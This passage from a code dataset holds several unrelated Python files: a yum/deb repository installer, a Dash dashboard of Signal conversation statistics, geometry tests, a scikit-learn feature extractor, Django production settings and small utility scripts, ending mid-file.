OSError as e:\n if e.errno != 17:\n raise e\n \n arch = os.uname()[4]\n if arch != 'x86_64':\n arch = 'i686'\n \n auth = \"{}:{}@\".format(username, token) if username and token else \"\"\n for product in products:\n buffer = []\n for component in variants:\n buffer.append('[{}-{}]'.format(product, component))\n buffer.append('name={} repository, component {} ({} {})'.format(\n product, component, dist_release, arch))\n buffer.append('baseurl={}://{}{}/{}/repository/rpm/{}/{}/{}/'.format(\n protocol, auth, server, product, dist_release, arch, component))\n buffer.append('enabled=1')\n buffer.append('gpgcheck=1')\n buffer.append('repo_gpgcheck=1')\n buffer.append('gpgkey=http://keyserver.ubuntu.com/pks/lookup?search=0x{}&op=get'.format(YumBackend.DEFAULT_KEY))\n buffer.append('enabled_metadata=1')\n buffer.append('')\n \n filename = \"{}/tiliado-{}.repo\".format(sources_dir, product)\n write_file(filename, \"\\n\".join(buffer), dry_run=self.dry_run)\n \n def add_key(self, key):\n argv = [\"rpm\", \"--import\", \"http://keyserver.ubuntu.com/pks/lookup?search=0x{}&op=get\".format(key)]\n exec_and_collects(argv, dry_run=self.dry_run)\n \n def update_db(self):\n argv = [\"yum\", \"makecache\", \"fast\", \"-y\"] + self.yum_opts\n exec_and_collects(argv, dry_run=self.dry_run)\n\ndef install(server, protocol, project, distribution, release, variants, username=None, token=None,\n install=None, dry_run=False, no_verify_ssl=False, http_proxy=None, https_proxy=None, **kwd):\n if http_proxy is not None:\n os.environ[\"http_proxy\"] = http_proxy\n if https_proxy is not None:\n os.environ[\"https_proxy\"] = https_proxy\n \n if distribution in (\"debian\", \"ubuntu\"):\n backend = DebBackend(verify_ssl = not no_verify_ssl, dry_run=dry_run)\n elif distribution in (\"fedora\",):\n backend = YumBackend(verify_ssl = not no_verify_ssl, dry_run=dry_run)\n else:\n log(\"Unsupported distribution: {}\".format(distribution))\n sys.exit(2)\n \n try:\n backend.prepare()\n \n if install:\n install = install.split(\",\")\n backend.remove_packages(install)\n \n backend.add_key(backend.DEFAULT_KEY)\n backend.add_repositories(protocol, server, username, token, project.split(\",\"), release, variants.split(\",\"))\n backend.update_db()\n \n if install:\n backend.install_packages(install)\n \n sys.exit(0)\n except subprocess.CalledProcessError as e:\n log(\"Subprocess Error: {}\".format(e))\n sys.exit(4)\n except OSError as e:\n log(\"OS Error: {}\".format(e))\n 
sys.exit(3)\n\ndef main():\n import argparse\n parser = argparse.ArgumentParser(description='Install repository.')\n parser.add_argument('-u', \"--username\", type=str, required=False)\n parser.add_argument('-t', \"--token\", type=str, required=False)\n parser.add_argument('-p', \"--project\", type=str, required=True)\n parser.add_argument('-d', \"--distribution\", type=str, required=True)\n parser.add_argument('-r', \"--release\", type=str, required=True)\n parser.add_argument('-v', \"--variants\", type=str, required=True)\n parser.add_argument(\"--server\", type=str, required=True)\n parser.add_argument(\"--protocol\", type=str, default=None)\n parser.add_argument(\"--http-proxy\", dest=\"http_proxy\", type=str, default=None)\n parser.add_argument(\"--https-proxy\", dest=\"https_proxy\", type=str, default=None)\n parser.add_argument(\"--dry-run\", action='store_true', default=False)\n parser.add_argument('-i', \"--install\", type=str)\n parser.add_argument('--no-verify-ssl', action=\"store_true\", default=False)\n args = parser.parse_args()\n \n install(**vars(args))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tiliadoweb/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":8420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"242982781","text":"N = int(input())\n\ndef main():\n graph = []\n for i in range(1, N+1):\n for j in range(i+1, N+1):\n if i+j == N//2*2+1:\n continue\n graph.append([i, j])\n print(len(graph))\n for i, j in graph:\n print(i, j)\n\nif __name__ == \"__main__\":\n main()","sub_path":"Python_codes/p03090/s929800306.py","file_name":"s929800306.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"623504670","text":"from sklearn.base import BaseEstimator\nfrom sklearn.base import TransformerMixin\nimport numpy as np\n\nclass FeatureExtractor(BaseEstimator, TransformerMixin):\n def __init__(self):\n pass\n\n def fit(self, X_df, y):\n return self\n\n def transform(self, X_df):\n X_df_new = X_df.copy()\n for i in np.arange(5):\n X_df_new = compute_derivative(X_df_new, 'NAD', i, i+1)\n X_df_new = compute_derivative(X_df_new, 'ADL', i, i+1)\n X_df_new = compute_derivative(X_df_new, 'NA', i, i+1)\n X_df_new = compute_derivative(X_df_new, 'NCD', i, i+1)\n X_df_new = compute_ratio(X_df_new, 'NCD', 'NAD', np.arange(6))\n X_df_new = compute_ratio(X_df_new, 'CS', 'NA', np.arange(6))\n return X_df_new.drop(columns = 'site')\n\n\ndef compute_derivative(data, feature, int1, int2):\n \"\"\"\n For a given dataframe, compute the normalized difference over the\n defined period of time time (int1, int2) of a feature (feature) \n\n Parameters\n ----------\n data : dataframe\n feature : str\n feature in the dataframe we wish to compute the difference\n int1 : int\n 1rst column to take\n int2 : int\n last column to take\n \n Return\n ----------\n The same data frame with int2 - int1 - 1 colums more\n\n \"\"\"\n features = [str(feature) + '_' + str(i) for i in range(int1, int2 + 1)]\n for i in range(len(features) - 1):\n data[str(feature) + '_Diff_' + str(i)] = data[features[i+1]] - data[features[i]]\n return data\n\ndef compute_ratio(data, feature1, feature2, ints):\n \"\"\"\n For a given dataframe, compute the normalized difference over the\n defined period of time time (int1, int2) of a feature (feature) \n\n Parameters\n ----------\n data : dataframe\n feature1 : str\n feature in the dataframe which will be in 
the numerator\n feature2 : str\n feature in the dataframe which will be in the denominator\n ints : list of int\n column indices for which to compute the ratio\n\n Return\n ----------\n The dataframe with len(ints) more columns\n\n \"\"\"\n new_feature = str(feature1) + \"/\" + str(feature2)\n for i in ints:\n temp = data[feature2 + '_' + str(i)] + 1 # add 1 to avoid division by zero\n data[new_feature + '_' + str(i)] = data[feature1 + '_' + str(i)] / temp\n\n return data\n","sub_path":"submissions/random-forest-regressor/feature_extractor.py","file_name":"feature_extractor.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
+{"seq_id":"227482169","text":"import numpy as np\nimport pytest\nfrom bbox import BBox3D\nfrom bbox.geometry import plane, point_plane_dist, polygon_area, polygon_intersection, polygon_collision, edges_of, orthogonal, is_separating_axis\n\n\ndef clip(subjectPolygon, clipPolygon):\n \"\"\"\n Naive implementation picked up from Rosetta Code.\n Only used for testing purposes.\n \"\"\"\n def inside(p):\n return(cp2[0]-cp1[0])*(p[1]-cp1[1]) > (cp2[1]-cp1[1])*(p[0]-cp1[0])\n\n def computeIntersection():\n dc = [cp1[0] - cp2[0], cp1[1] - cp2[1]]\n dp = [s[0] - e[0], s[1] - e[1]]\n n1 = cp1[0] * cp2[1] - cp1[1] * cp2[0]\n n2 = s[0] * e[1] - s[1] * e[0]\n n3 = 1.0 / (dc[0] * dp[1] - dc[1] * dp[0])\n return [(n1*dp[0] - n2*dc[0]) * n3, (n1*dp[1] - n2*dc[1]) * n3]\n\n outputList = subjectPolygon\n cp1 = clipPolygon[-1]\n\n for clipVertex in clipPolygon:\n cp2 = clipVertex\n inputList = outputList\n outputList = []\n s = inputList[-1]\n\n for subjectVertex in inputList:\n e = subjectVertex\n if inside(e):\n if not inside(s):\n outputList.append(computeIntersection())\n outputList.append(e)\n elif inside(s):\n outputList.append(computeIntersection())\n s = e\n cp1 = cp2\n return(outputList)\n\n\ndef test_plane():\n # define the 3 points\n a = np.array([1, 1, 1])\n b = np.array([-1, 1, 0])\n c = np.array([2, 0, 3])\n assert np.array_equal(plane(a, b, c), np.array([-1, 3, 2, -4]))\n\n\ndef test_point_plane_dist():\n pt = np.array([2, 8, 5])\n plane = np.array([1, -2, -2, -1])\n assert point_plane_dist(pt, plane) == 25/3\n assert point_plane_dist(pt, plane, signed=True) == -25/3\n\n\ndef test_polygon_area():\n polygon = np.array([[-3, -2], [-1, 4], [6, 1], [3, 10], [-4, 9]])\n assert polygon_area(polygon) == 60\n\n\ndef test_polygon_intersection():\n a = BBox3D(0.5, 0.5, 0.5, 1, 1, 1)\n b = BBox3D(1, 1, 1, 1, 1, 1)\n\n i1 = clip(a.p[0: 4, 0: 2], b.p[0: 4, 0: 2])\n i1 = np.array(i1)\n i2 = polygon_intersection(a.p[0: 4, 0: 2], b.p[0: 4, 0: 2])\n assert np.array_equal(i1, i2)\n\n\n# Ensure 100% test coverage\ndef test_is_separating_axis():\n # randomly generated values\n a = BBox3D(0.9, 0.5, 0.5, 1, 1, 1)\n b = BBox3D(0.1, 0.1, 0.1, 0.1, 1, 1)\n\n p1, p2 = a.p[0:4, 0:2], b.p[0:4, 0:2]\n edges = edges_of(p1)\n edges += edges_of(p2)\n\n # this axis does not separate the polygons, so a push vector is returned\n separates, pv = is_separating_axis(orthogonal(edges[0]), p1, p2)\n assert separates == False and pv is not None\n\n # this axis separates the polygons, so no push vector is returned\n separates, pv = is_separating_axis(orthogonal(edges[1]), p1, p2)\n assert separates == True and pv is None\n\n\ndef test_polygon_no_collision():\n # randomly generated values\n a = BBox3D(0.9, 0.5, 0.5, 1, 1, 1)\n b = BBox3D(0.1, 0.1, 0.1, 0.1, 1, 1)\n p1, p2 = a.p[0:4, 0:2], b.p[0:4, 0:2]\n\n assert polygon_collision(p1, p2) == 
False","sub_path":"tests/test_geometry.py","file_name":"test_geometry.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"288369382","text":"\"\"\"Analysis of the data\"\"\"\n\nimport itertools\nimport logging\nimport pickle\nimport re\nimport time\nfrom datetime import timedelta\n\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport emoji\nimport numpy as np\nimport pandas as pd\nimport plotly.graph_objs as go\nfrom dash.dependencies import Input, Output\n\nimport db\nimport utilities\n\nLOGGER = logging.getLogger(__name__)\n\nEMOJI_SET = set(emoji.UNICODE_EMOJI)\n\nLOGGER.debug(\"Unpickling configuration\")\nCONFIG = pickle.load(open(\".config.pkl\", \"rb\"))\nLAST_UPDATE = time.time()\nMESSAGES = db.fetch_messages(CONFIG, as_dataframe=True)\nCONVS = utilities.conversation_mapping(CONFIG)\n\nAPP = dash.Dash(\"signal-statistics\")\n# APP.config[\"suppress_callback_exceptions\"] = True\nAPP.layout = html.Div(\n [\n # Header\n html.Div(\n [\n html.Span(\"Signal Conversation Statistics\", className=\"title\"),\n html.Div(\n [\n dcc.Dropdown(\n id=\"conversation\",\n options=sorted(\n [\n {\"label\": v, \"value\": k.decode(\"UTF-8\")}\n for k, v in CONVS.items()\n ],\n key=lambda o: o[\"label\"],\n ),\n )\n ],\n className=\"conversation-selector\",\n ),\n ],\n className=\"header\",\n ),\n # Content\n html.Div(\n [\n # Timeline\n html.Div(\n [\n html.H2(\"Conversation Timeline\"),\n dcc.Tabs(\n [\n dcc.Tab(label=\"Messages\", value=\"messages\"),\n dcc.Tab(label=\"Words\", value=\"words\"),\n dcc.Tab(label=\"Characters\", value=\"characters\"),\n ],\n id=\"timeline-value\",\n value=\"messages\",\n ),\n dcc.Loading(dcc.Graph(id=\"timeline-figure\")),\n ],\n className=\"timeline\",\n ),\n # Histogram\n html.Div(\n [\n html.H2(\"Histogram\"),\n html.Div(\n [\n dcc.Dropdown(\n id=\"histogram-reduction\",\n options=[\n {\n \"label\": \"Day of Week\",\n \"value\": \"day_of_week\",\n },\n {\n \"label\": \"Time of Day\",\n \"value\": \"time_of_day\",\n },\n ],\n value=\"time_of_day\",\n clearable=False,\n ),\n dcc.Dropdown(\n id=\"histogram-value\",\n options=[\n {\"label\": \"Messages\", \"value\": \"messages\"},\n {\"label\": \"Words\", \"value\": \"words\"},\n {\"label\": \"Characters\", \"value\": \"characters\"},\n ],\n value=\"messages\",\n clearable=False,\n ),\n ]\n ),\n dcc.Loading(dcc.Graph(id=\"histogram-figure\")),\n ],\n className=\"histogram\",\n ),\n # Emoji\n html.Div(\n [\n html.H2(\"Emoji Use\"),\n dcc.Loading(dcc.Graph(id=\"emoji-figure\")),\n dcc.Slider(\n id=\"emoji-threshold\",\n min=0,\n max=100,\n step=5,\n value=10,\n dots=True,\n marks={v: f\"{v}\" for v in range(0, 100 + 1, 10)},\n ),\n ],\n className=\"emoji\",\n ),\n # n-grams\n html.Div(\n [\n html.H2(\"N-grams\"),\n dcc.Slider(\n id=\"ngrams-words\",\n min=1,\n max=10,\n step=1,\n value=2,\n dots=True,\n marks={v: f\"{v}\" for v in range(1, 11, 1)},\n ),\n dcc.Loading(dcc.Graph(id=\"ngrams-figure\")),\n dcc.Slider(\n id=\"ngrams-threshold\",\n min=0,\n max=100,\n step=5,\n value=10,\n dots=True,\n marks={v: f\"{v}\" for v in range(0, 100 + 1, 10)},\n ),\n ],\n className=\"ngrams\",\n ),\n # Conversation starter\n html.Div(\n [\n html.H2(\"Conversation starter\"),\n dcc.Loading(dcc.Graph(id=\"conversation-starter-figure\")),\n dcc.Slider(\n id=\"conversation-starter-threshold\",\n min=0,\n max=6,\n step=0.5,\n value=2,\n dots=True,\n marks={v: f\"{v}h\" for v in range(0, 6 + 1, 1)},\n 
),\n ],\n className=\"conversation-starter\",\n ),\n ],\n className=\"content\",\n ),\n ]\n)\n\n\ndef load_messages():\n \"\"\"Load the messages, possibly updating the global variable if needed.\"\"\"\n global LAST_UPDATE\n global MESSAGES\n\n if MESSAGES is None or time.time() - LAST_UPDATE > 60:\n LOGGER.info(\"Updating messages...\")\n LAST_UPDATE = time.time()\n MESSAGES = db.fetch_messages(CONFIG, as_dataframe=True)\n else:\n LOGGER.debug(\"Using pre-fetched messages.\")\n\n return MESSAGES.copy()\n\n\ndef select_conversation(messages, conversation):\n \"\"\"Select those messages which belong to the selected conversation.\"\"\"\n if conversation:\n messages = messages[messages[\"conversation_id\"] == conversation.encode(\"UTF-8\")]\n\n return messages\n\n\ndef split_messages(messages, conversation):\n \"\"\"Select those messages which belong to the selected conversation and split\n them into incoming and outgoing messages.\"\"\"\n messages = select_conversation(messages, conversation)\n\n return (messages.query(\"type == 'incoming'\"), messages.query(\"type == 'outgoing'\"))\n\n\ndef filter_timeline(messages, timeline_data):\n \"\"\"Filter messages selecting only those messages in the timeline's range.\"\"\"\n if timeline_data is None:\n return messages\n\n if \"xaxis.range\" in timeline_data:\n start, end = timeline_data[\"xaxis.range\"]\n elif \"xaxis.range[0]\" in timeline_data:\n start = timeline_data[\"xaxis.range[0]\"]\n end = timeline_data[\"xaxis.range[1]\"]\n else:\n return messages\n\n start = pd.to_datetime(start)\n end = pd.to_datetime(end)\n messages = messages[(start < messages[\"sent_at\"]) & (messages[\"sent_at\"] < end)]\n return messages\n\n\n@APP.callback(\n Output(\"timeline-figure\", \"figure\"),\n [Input(\"timeline-value\", \"value\"), Input(\"conversation\", \"value\")],\n)\ndef timeline(value, conversation):\n \"\"\"Create a timeline of the timeline showing how much activity there was on\n each day.\"\"\"\n\n messages = load_messages()\n messages[\"messages\"] = messages[\"body\"].apply(lambda x: 1 if x else 0)\n messages[\"words\"] = messages[\"body\"].apply(lambda x: len(x.split()) if x else 0)\n messages[\"characters\"] = messages[\"body\"].apply(lambda x: len(x) if x else 0)\n\n incoming, outgoing = split_messages(messages, conversation)\n\n hist_options = {\"xbins\": {\"size\": \"1D\"}, \"histfunc\": \"sum\", \"opacity\": 0.5}\n layout = {\n \"xaxis\": {\n \"name\": \"Date\",\n \"type\": \"date\",\n \"rangeselector\": {\n \"buttons\": [\n {\n \"label\": \"1m\",\n \"count\": 1,\n \"step\": \"month\",\n \"stepmode\": \"backward\",\n },\n {\n \"label\": \"6m\",\n \"count\": 6,\n \"step\": \"month\",\n \"stepmode\": \"backward\",\n },\n {\"step\": \"all\"},\n ]\n },\n \"rangeslider\": {\"visible\": True},\n },\n \"barmode\": \"overlay\",\n }\n\n data = [\n go.Histogram(\n x=incoming[\"sent_at\"], y=incoming[value], name=\"Received\", **hist_options\n ),\n go.Histogram(\n x=outgoing[\"sent_at\"], y=outgoing[value], name=\"Sent\", **hist_options\n ),\n ]\n\n if incoming.size < outgoing.size:\n data.reverse()\n\n return dict(data=data, layout=layout)\n\n\n@APP.callback(\n Output(\"histogram-figure\", \"figure\"),\n [\n Input(\"histogram-value\", \"value\"),\n Input(\"histogram-reduction\", \"value\"),\n Input(\"conversation\", \"value\"),\n Input(\"timeline-figure\", \"relayoutData\"),\n ],\n)\ndef histogram(value, reduction, conversation, timeline_data):\n \"\"\"Create a histogram of the conversation, reducing the data as per the\n reduction.\"\"\"\n\n messages 
= load_messages()\n messages = filter_timeline(messages, timeline_data)\n\n messages[\"messages\"] = messages[\"body\"].apply(lambda x: 1 if x else 0)\n messages[\"words\"] = messages[\"body\"].apply(lambda x: len(x.split()) if x else 0)\n messages[\"characters\"] = messages[\"body\"].apply(lambda x: len(x) if x else 0)\n messages[\"time_of_day\"] = messages[\"sent_at\"].apply(\n lambda t: t.hour + t.minute / 60 + t.second / 60 / 60\n )\n messages[\"day_of_week\"] = messages[\"sent_at\"].apply(lambda t: t.weekday())\n messages.sort_values(by=reduction, inplace=True)\n\n incoming, outgoing = split_messages(messages, conversation)\n\n hist_options = {\"opacity\": 0.5}\n layout = {\"bargap\": 0.2, \"bargroupgap\": 0.0}\n\n if reduction == \"day_of_week\":\n print(messages[value].unique())\n hist_options[\"nbinsx\"] = 7\n # hist_options[\"xbins\"] = {\"size\": 1}\n layout[\"xaxis\"] = {\n \"type\": \"category\",\n \"tickmode\": \"array\",\n \"tickvals\": [0, 1, 2, 3, 4, 5, 6],\n \"ticktext\": [\n \"Monday\",\n \"Tuesday\",\n \"Wednesday\",\n \"Thursday\",\n \"Friday\",\n \"Saturday\",\n \"Sunday\",\n ],\n }\n elif reduction == \"time_of_day\":\n hist_options[\"nbinsx\"] = 24\n # hist_options[\"xbins\"] = {\"size\": 1}\n layout[\"xaxis\"] = {\"tick0\": 0, \"dtick\": 1}\n\n data = [\n go.Histogram(\n x=incoming[reduction], y=incoming[value], name=\"Received\", **hist_options\n ),\n go.Histogram(\n x=outgoing[reduction], y=outgoing[value], name=\"Sent\", **hist_options\n ),\n ]\n\n if incoming.size < outgoing.size:\n data.reverse()\n\n return dict(data=data, layout=layout)\n\n\n@APP.callback(\n Output(\"emoji-figure\", \"figure\"),\n [\n Input(\"emoji-threshold\", \"value\"),\n Input(\"conversation\", \"value\"),\n Input(\"timeline-figure\", \"relayoutData\"),\n ],\n)\ndef emoji_use(threshold, conversation, timeline_data):\n \"\"\"Create a histogram of the conversation, reducing the data as per the\n reduction.\"\"\"\n\n messages = load_messages()\n messages = filter_timeline(messages, timeline_data)\n\n messages[\"emoji\"] = (\n messages[\"body\"]\n .apply(lambda txt: txt if txt else \"\")\n .apply(lambda txt: [l for l in txt if l in EMOJI_SET])\n )\n\n incoming, outgoing = split_messages(messages, conversation)\n values, counts = np.unique(incoming[\"emoji\"].sum(), return_counts=True)\n in_emojis = pd.Series(index=values, data=counts)\n values, counts = np.unique(outgoing[\"emoji\"].sum(), return_counts=True)\n out_emojis = pd.Series(index=values, data=counts)\n\n data = pd.concat(\n {\"incoming\": in_emojis, \"outgoing\": out_emojis}, axis=1, sort=False\n ).fillna(0)\n data[\"total\"] = data[\"incoming\"] + data[\"outgoing\"]\n data.sort_values(by=\"total\", inplace=True, ascending=False)\n data = data.query(f\"total >= {threshold}\")\n\n hist_options = {\"opacity\": 0.5}\n layout = {\"bargap\": 0.2, \"bargroupgap\": 0.0}\n\n data = [\n go.Bar(x=data.index, y=data[\"incoming\"], name=\"Received\", **hist_options),\n go.Bar(x=data.index, y=data[\"outgoing\"], name=\"Sent\", **hist_options),\n ]\n\n if incoming.size < outgoing.size:\n data.reverse()\n\n return dict(data=data, layout=layout)\n\n\n@APP.callback(\n Output(\"ngrams-figure\", \"figure\"),\n [\n Input(\"ngrams-words\", \"value\"),\n Input(\"ngrams-threshold\", \"value\"),\n Input(\"conversation\", \"value\"),\n Input(\"timeline-figure\", \"relayoutData\"),\n ],\n)\ndef ngrams(n, threshold, conversation, timeline_data):\n \"\"\"Create a histogram of the conversation, reducing the data as per the\n reduction.\"\"\"\n\n messages = 
load_messages()\n messages = filter_timeline(messages, timeline_data)\n\n punct = re.compile(\"[.,;:!?]\")\n\n messages[\"ngrams\"] = (\n messages[\"body\"]\n # Lowercase everything\n .apply(lambda x: x.lower() if x else \"\")\n # Replace ’ with '\n .apply(lambda x: x.replace(\"’\", \"'\"))\n # split at punctuation (ngrams don't cross a full stop)\n .apply(punct.split)\n # split each segment now based on whitespace\n .apply(lambda x: [s.split() for s in x])\n # take all n-contiguous subsets of each split segment, and join them\n # with a whitespace\n .apply(\n lambda x: [\n [\" \".join(s[i : i + n]) for i in range(len(s) - n + 1)] for s in x\n ]\n )\n # flatten the array\n .apply(lambda x: list(itertools.chain(*x)))\n )\n\n incoming, outgoing = split_messages(messages, conversation)\n values, counts = np.unique(incoming[\"ngrams\"].sum(), return_counts=True)\n in_grams = pd.Series(index=values, data=counts)\n values, counts = np.unique(outgoing[\"ngrams\"].sum(), return_counts=True)\n out_grams = pd.Series(index=values, data=counts)\n\n data = pd.concat(\n {\"incoming\": in_grams, \"outgoing\": out_grams}, axis=1, sort=False\n ).fillna(0)\n data[\"total\"] = data[\"incoming\"] + data[\"outgoing\"]\n data.sort_values(by=\"total\", inplace=True, ascending=False)\n data = data.query(f\"total >= {threshold}\")\n\n hist_options = {\"opacity\": 0.5}\n layout = {\"bargap\": 0.2, \"bargroupgap\": 0.0}\n\n data = [\n go.Bar(x=data.index, y=data[\"incoming\"], name=\"Received\", **hist_options),\n go.Bar(x=data.index, y=data[\"outgoing\"], name=\"Sent\", **hist_options),\n ]\n\n if incoming.size < outgoing.size:\n data.reverse()\n\n return dict(data=data, layout=layout)\n\n\n@APP.callback(\n Output(\"conversation-starter-figure\", \"figure\"),\n [\n Input(\"conversation-starter-threshold\", \"value\"),\n Input(\"conversation\", \"value\"),\n Input(\"timeline-figure\", \"relayoutData\"),\n ],\n)\ndef conversation_starter(threshold, conversation, timeline_data):\n \"\"\"Create a pie chart of who initiates conversations\"\"\"\n if conversation:\n conversation_label = CONVS[conversation.encode(\"UTF-8\")]\n else:\n conversation_label = \"Others\"\n\n messages = load_messages()\n messages = filter_timeline(messages, timeline_data)\n messages = select_conversation(messages, conversation)\n\n threshold = timedelta(seconds=threshold * 3600)\n conversations = [\n {\n \"starter\": messages.iloc[0][\"type\"],\n \"start\": messages.iloc[0][\"sent_at\"],\n \"last\": messages.iloc[0][\"sent_at\"],\n }\n ]\n for _, msg in messages.iterrows():\n if msg[\"sent_at\"] - conversations[-1][\"last\"] < threshold:\n conversations[-1][\"last\"] = msg[\"sent_at\"]\n else:\n conversations.append(\n {\n \"starter\": msg[\"type\"],\n \"start\": msg[\"sent_at\"],\n \"last\": msg[\"sent_at\"],\n }\n )\n conversations = pd.DataFrame(conversations)\n conversations[\"length\"] = conversations[\"last\"] - conversations[\"start\"]\n\n data = conversations[\"starter\"].value_counts().to_frame()\n data.index = data.index.map({\"outgoing\": \"Me\", \"incoming\": conversation_label})\n data[\"msg_count\"] = 0\n for idx in data.index:\n data.loc[idx, \"msg_count\"] = len(messages.query(f\"type == '{idx}'\").index)\n data.sort_values(by=\"msg_count\", inplace=True)\n\n layout = {}\n\n data = [go.Pie(labels=data.index, values=data[\"starter\"])]\n\n return dict(data=data, layout=layout)\n\n\ndef main(debug):\n \"\"\"Start the plot.ly server\"\"\"\n LOGGER.info(\"Starting plot.ly server\")\n\n 
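# Illustration (a sketch; the two names below are hypothetical and unused):
# the timeline graph's relayoutData, consumed by filter_timeline() above,
# arrives in one of two shapes depending on whether the range slider or a
# zoom gesture produced it. Both bounds are ISO date strings.
_example_slider_relayout = {"xaxis.range": ["2019-01-01", "2019-06-30"]}
_example_zoom_relayout = {"xaxis.range[0]": "2019-01-01", "xaxis.range[1]": "2019-06-30"}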
APP.run_server(debug=debug)\n","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":17976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"352484122","text":"import argparse\n\n\ndef get_formatted_price(price_string):\n price = float(price_string.replace(',', '.'))\n if price.is_integer():\n price_formatted = \"{:,.0f}\".format(price)\n else:\n price_formatted = \"{:,.2f}\".format(price)\n return price_formatted.replace(',', ' ')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"Price formatter\")\n parser.add_argument(\"price_string\", help=\"the price you want to format\")\n args = parser.parse_args()\n try:\n pretty_price = get_formatted_price(args.price_string)\n except ValueError as error:\n print(\"Something went wrong!\", error)\n exit(\"Exiting...\")\n print(pretty_price)\n","sub_path":"format_price.py","file_name":"format_price.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"533734962","text":"import os\n\ndef main():\n counter = 0\n rootDir = \"/Applications/XAMPP/xamppfiles/htdocs/Music_d\"\n\n for subdir, dirs, files in os.walk(rootDir):\n for file in files:\n path = str(os.path.join(subdir, file))\n\n ext = [\".php\", \".html\", \".css\", \".js\", \".scss\"]\n\n for i in ext:\n # match the extension at the end of the path only, and use a\n # context manager so every file handle is closed\n if path.endswith(i):\n with open(path, \"r\") as source:\n counter += len(source.readlines())\n break\n print(\"Counter\", counter)\n\nmain()","sub_path":"tools/lineCounter.py","file_name":"lineCounter.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
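# A sketch of the same line count with pathlib (separate from lineCounter.py
# above; the function name is ours): rglob walks the tree and suffix matching
# replaces the substring test, which would also match extensions mid-path.
from pathlib import Path

def count_lines(root, exts=(".php", ".html", ".css", ".js", ".scss")):
    total = 0
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix in exts:
            # errors="ignore" because web assets are not always valid UTF-8
            with path.open("r", errors="ignore") as source:
                total += sum(1 for _ in source)
    return total
+{"seq_id":"432945015","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport random\n\nnoun = (\"總經理 zǒngjīnglǐ bank manager\",\"銀行 yínháng bank\",\"她 tā she\")\nverb = (\"jumps\", \"walks\", \"crawls\")\npreposition = (\"under\",\"over\")\n\nprint (\"\\n\" + random.choice(noun) + \"\\n\" + random.choice(verb)+ \"\\n\")\n","sub_path":"languages/python/mandarin/random.words.py","file_name":"random.words.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"644130990","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDjango settings for production environment.\n\n- Load secret values from environment variables.\n\"\"\"\n\nfrom .base import * # noqa: F403\n\n# SECRET CONFIGURATION\n# ------------------------------------------------------------------------------\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key\n# Raises ImproperlyConfigured exception if DJANGO_SECRET_KEY not in os.environ\nSECRET_KEY = env(\"DJANGO_SECRET_KEY\") # noqa: F405\n\n# DATABASE CONFIGURATION\n# ----------------------------------------------------------------------------\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases\nDATABASES = {\n \"default\": env.db(\"DATABASE_URL\"), # noqa: F405\n}\nDATABASES[\"default\"][\"ATOMIC_REQUESTS\"] = True\n\n# Allow all host headers\nALLOWED_HOSTS = [\"*\"]\n\n# This ensures that Django will be able to detect a secure connection\n# properly on Heroku.\nSECURE_PROXY_SSL_HEADER = (\"HTTP_X_FORWARDED_PROTO\", \"https\")\n\n# SECURITY CONFIGURATION\n# ------------------------------------------------------------------------------\n# See 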
https://docs.djangoproject.com/en/dev/ref/middleware/#module-django.middleware.security\n# and https://docs.djangoproject.com/en/dev/howto/deployment/checklist/#run-manage-py-check-deploy\n\n# set this to 60 seconds and then to 518400 when you can prove it works\nSECURE_HSTS_SECONDS = 60\nSECURE_HSTS_INCLUDE_SUBDOMAINS = env.bool(\"DJANGO_SECURE_HSTS_INCLUDE_SUBDOMAINS\", default=True) # noqa: F405\nSECURE_CONTENT_TYPE_NOSNIFF = env.bool(\"DJANGO_SECURE_CONTENT_TYPE_NOSNIFF\", default=True) # noqa: F405\nSECURE_BROWSER_XSS_FILTER = True\nSESSION_COOKIE_SECURE = True\nSESSION_COOKIE_HTTPONLY = True\nSECURE_SSL_REDIRECT = env.bool(\"DJANGO_SECURE_SSL_REDIRECT\", default=True) # noqa: F405\nCSRF_COOKIE_SECURE = True\nCSRF_COOKIE_HTTPONLY = True\nX_FRAME_OPTIONS = \"DENY\"\nINSTALLED_APPS += [\"gunicorn\", ] # noqa: F405\n\n# Static Assets\n# ------------------------\nSTATICFILES_STORAGE = \"whitenoise.storage.CompressedManifestStaticFilesStorage\"\n\nLOGGING = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"handlers\": {\n \"console\": {\n \"level\": \"INFO\",\n \"class\": \"logging.StreamHandler\",\n },\n },\n \"loggers\": {\n \"django\": {\n \"handlers\": [\"console\"],\n }\n }\n}\n\n# Use Google Cloud Platform for storage\nDEFAULT_FILE_STORAGE = \"config.storage.GoogleCloudStorage\"\n","sub_path":"cs4teachers/config/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"37601681","text":"from activation_functions import sigmoid, sigmoidp\nfrom cost_functions import mse\nfrom data import INPUT_INDEX, OUTPUT_INDEX\nfrom fileio import read_json, write_json\nfrom neuron import Neuron\nfrom tqdm import tqdm\n\nclass Network:\n def __init__(self, structure, 